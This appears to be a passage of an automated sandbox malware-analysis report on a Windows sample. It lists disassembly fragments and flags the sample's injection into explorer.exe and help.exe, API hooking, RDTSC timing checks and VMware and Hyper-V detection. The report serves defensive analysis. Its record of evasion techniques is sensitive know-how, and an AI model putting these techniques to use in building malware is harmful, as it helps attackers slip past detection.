              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039D55C push eax; ret 0_2_0039D562
              Source: C:\Windows\explorer.exeCode function: 1_2_047AE07A push esp; ret 1_2_047AE07B
              Source: C:\Windows\explorer.exeCode function: 1_2_047ABB1E push esp; retn 0000h1_2_047ABB1F
              Source: C:\Windows\explorer.exeCode function: 1_2_047ABB02 push esp; retn 0000h1_2_047ABB03
              Source: C:\Windows\explorer.exeCode function: 1_2_047AB9B5 push esp; retn 0000h1_2_047ABAE7
              Source: C:\Windows\explorer.exeCode function: 1_2_0DEB79B5 push esp; retn 0000h1_2_0DEB7AE7
              Source: C:\Windows\explorer.exeCode function: 1_2_0DEBA07A push esp; ret 1_2_0DEBA07B
              Source: C:\Windows\explorer.exeCode function: 1_2_0DEB7B02 push esp; retn 0000h1_2_0DEB7B03
              Source: C:\Windows\explorer.exeCode function: 1_2_0DEB7B1E push esp; retn 0000h1_2_0DEB7B1F
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0381D0D1 push ecx; ret 2_2_0381D0E4
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DCE2C7 push cs; ret 2_2_02DCE2D4
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DD6AE8 push FFFFFFE8h; ret 2_2_02DD6AF3
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DD7A35 push eax; iretd 2_2_02DD7A36
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDE000 push edi; ret 2_2_02DDE002
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DD7168 pushfd ; iretd 2_2_02DD716A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDD4FB push eax; ret 2_2_02DDD562
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDD4F2 push eax; ret 2_2_02DDD4F8
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDD4A5 push eax; ret 2_2_02DDD4F8
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DD7C76 push esp; ret 2_2_02DD7C79
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDD55C push eax; ret 2_2_02DDD562
              Source: initial sampleStatic PE information: section name: .text entropy: 7.410112834615964

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeRDTSC instruction interceptor: First address: 0000000000389904 second address: 000000000038990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeRDTSC instruction interceptor: First address: 0000000000389B6E second address: 0000000000389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002DC9904 second address: 0000000002DC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002DC9B6E second address: 0000000002DC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-13919
              Source: C:\Windows\SysWOW64\help.exe TID: 1132Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_00389AA0 rdtsc 0_2_00389AA0
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865
              Source: C:\Windows\SysWOW64\help.exeAPI coverage: 9.6 %
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeProcess information queried: ProcessInformation
              Source: explorer.exe, 00000001.00000002.517521328.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000001.00000002.517521328.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
              Source: explorer.exe, 00000001.00000003.464031799.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.522819505.000000000F5CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388138A mov eax, dword ptr fs:[00000030h]2_2_0388138A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]2_2_037EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]2_2_037EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]2_2_037EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]2_2_037EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]2_2_037EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D766D mov eax, dword ptr fs:[00000030h]2_2_037D766D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038446A7 mov eax, dword ptr fs:[00000030h]2_2_038446A7
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]2_2_03890EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]2_2_03890EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]2_2_03890EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]2_2_037C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]2_2_037C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]2_2_037C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]2_2_037C9240
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]2_2_037D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0387FEC0 mov eax, dword ptr fs:[00000030h]2_2_0387FEC0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03808EC7 mov eax, dword ptr fs:[00000030h]2_2_03808EC7
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CE620 mov eax, dword ptr fs:[00000030h]2_2_037CE620
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03898ED6 mov eax, dword ptr fs:[00000030h]2_2_03898ED6
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E3A1C mov eax, dword ptr fs:[00000030h]2_2_037E3A1C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FA61C mov eax, dword ptr fs:[00000030h]2_2_037FA61C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FA61C mov eax, dword ptr fs:[00000030h]2_2_037FA61C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CAA16 mov eax, dword ptr fs:[00000030h]2_2_037CAA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CAA16 mov eax, dword ptr fs:[00000030h]2_2_037CAA16
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]2_2_037C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C5210 mov ecx, dword ptr fs:[00000030h]2_2_037C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]2_2_037C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]2_2_037C5210
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D8A0A mov eax, dword ptr fs:[00000030h]2_2_037D8A0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]2_2_037CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]2_2_037CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]2_2_037CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F8E00 mov eax, dword ptr fs:[00000030h]2_2_037F8E00
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881608 mov eax, dword ptr fs:[00000030h]2_2_03881608
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2AE4 mov eax, dword ptr fs:[00000030h]2_2_037F2AE4
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F16E0 mov ecx, dword ptr fs:[00000030h]2_2_037F16E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D76E2 mov eax, dword ptr fs:[00000030h]2_2_037D76E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03804A2C mov eax, dword ptr fs:[00000030h]2_2_03804A2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03804A2C mov eax, dword ptr fs:[00000030h]2_2_03804A2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F36CC mov eax, dword ptr fs:[00000030h]2_2_037F36CC
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2ACB mov eax, dword ptr fs:[00000030h]2_2_037F2ACB
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0387FE3F mov eax, dword ptr fs:[00000030h]2_2_0387FE3F
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388AE44 mov eax, dword ptr fs:[00000030h]2_2_0388AE44
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388AE44 mov eax, dword ptr fs:[00000030h]2_2_0388AE44
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DAAB0 mov eax, dword ptr fs:[00000030h]2_2_037DAAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DAAB0 mov eax, dword ptr fs:[00000030h]2_2_037DAAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FFAB0 mov eax, dword ptr fs:[00000030h]2_2_037FFAB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03854257 mov eax, dword ptr fs:[00000030h]2_2_03854257
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]2_2_037C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]2_2_037C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]2_2_037C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]2_2_037C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]2_2_037C52A5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388EA55 mov eax, dword ptr fs:[00000030h]2_2_0388EA55
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0387B260 mov eax, dword ptr fs:[00000030h]2_2_0387B260
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0387B260 mov eax, dword ptr fs:[00000030h]2_2_0387B260
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FD294 mov eax, dword ptr fs:[00000030h]2_2_037FD294
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FD294 mov eax, dword ptr fs:[00000030h]2_2_037FD294
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03898A62 mov eax, dword ptr fs:[00000030h]2_2_03898A62
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380927A mov eax, dword ptr fs:[00000030h]2_2_0380927A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EC577 mov eax, dword ptr fs:[00000030h]2_2_037EC577
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EC577 mov eax, dword ptr fs:[00000030h]2_2_037EC577
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CB171 mov eax, dword ptr fs:[00000030h]2_2_037CB171
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CB171 mov eax, dword ptr fs:[00000030h]2_2_037CB171
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CC962 mov eax, dword ptr fs:[00000030h]2_2_037CC962
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038469A6 mov eax, dword ptr fs:[00000030h]2_2_038469A6
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038905AC mov eax, dword ptr fs:[00000030h]2_2_038905AC
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038905AC mov eax, dword ptr fs:[00000030h]2_2_038905AC
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E7D50 mov eax, dword ptr fs:[00000030h]2_2_037E7D50
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EB944 mov eax, dword ptr fs:[00000030h]2_2_037EB944
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EB944 mov eax, dword ptr fs:[00000030h]2_2_037EB944
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]2_2_038451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]2_2_038451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]2_2_038451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]2_2_038451BE
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]2_2_037F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]2_2_037F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]2_2_037F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F513A mov eax, dword ptr fs:[00000030h]2_2_037F513A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F513A mov eax, dword ptr fs:[00000030h]2_2_037F513A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]2_2_037D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CAD30 mov eax, dword ptr fs:[00000030h]2_2_037CAD30
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov ecx, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]2_2_03846DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]2_2_037E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]2_2_037E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]2_2_037E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]2_2_037E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E4120 mov ecx, dword ptr fs:[00000030h]2_2_037E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]2_2_0388FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]2_2_0388FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]2_2_0388FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]2_2_0388FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038541E8 mov eax, dword ptr fs:[00000030h]2_2_038541E8
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03878DF1 mov eax, dword ptr fs:[00000030h]2_2_03878DF1
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]2_2_037C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]2_2_037C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]2_2_037C9100
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]2_2_037CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]2_2_037CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]2_2_037CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DD5E0 mov eax, dword ptr fs:[00000030h]2_2_037DD5E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DD5E0 mov eax, dword ptr fs:[00000030h]2_2_037DD5E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0388E539 mov eax, dword ptr fs:[00000030h]2_2_0388E539
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0384A537 mov eax, dword ptr fs:[00000030h]2_2_0384A537
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03898D34 mov eax, dword ptr fs:[00000030h]2_2_03898D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03803D43 mov eax, dword ptr fs:[00000030h]2_2_03803D43
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03843540 mov eax, dword ptr fs:[00000030h]2_2_03843540
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]2_2_037F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]2_2_037F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]2_2_037F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F35A1 mov eax, dword ptr fs:[00000030h]2_2_037F35A1
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F61A0 mov eax, dword ptr fs:[00000030h]2_2_037F61A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F61A0 mov eax, dword ptr fs:[00000030h]2_2_037F61A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FFD9B mov eax, dword ptr fs:[00000030h]2_2_037FFD9B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FFD9B mov eax, dword ptr fs:[00000030h]2_2_037FFD9B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2990 mov eax, dword ptr fs:[00000030h]2_2_037F2990
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]2_2_037C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]2_2_037C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]2_2_037C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]2_2_037C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]2_2_037C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FA185 mov eax, dword ptr fs:[00000030h]2_2_037FA185
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037EC182 mov eax, dword ptr fs:[00000030h]2_2_037EC182
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]2_2_037F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]2_2_037F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]2_2_037F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]2_2_037F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03843884 mov eax, dword ptr fs:[00000030h]2_2_03843884
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03843884 mov eax, dword ptr fs:[00000030h]2_2_03843884
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E746D mov eax, dword ptr fs:[00000030h]2_2_037E746D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E0050 mov eax, dword ptr fs:[00000030h]2_2_037E0050
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037E0050 mov eax, dword ptr fs:[00000030h]2_2_037E0050
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038090AF mov eax, dword ptr fs:[00000030h]2_2_038090AF
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FA44B mov eax, dword ptr fs:[00000030h]2_2_037FA44B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]2_2_037F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]2_2_037F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]2_2_037F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]2_2_037F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]2_2_037F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FBC2C mov eax, dword ptr fs:[00000030h]2_2_037FBC2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]2_2_0385B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]2_2_037DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]2_2_037DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]2_2_037DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]2_2_037DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03898CD6 mov eax, dword ptr fs:[00000030h]2_2_03898CD6
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038814FB mov eax, dword ptr fs:[00000030h]2_2_038814FB
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]2_2_03846CF0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]2_2_03846CF0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]2_2_03846CF0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]2_2_0389740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]2_2_0389740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]2_2_0389740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
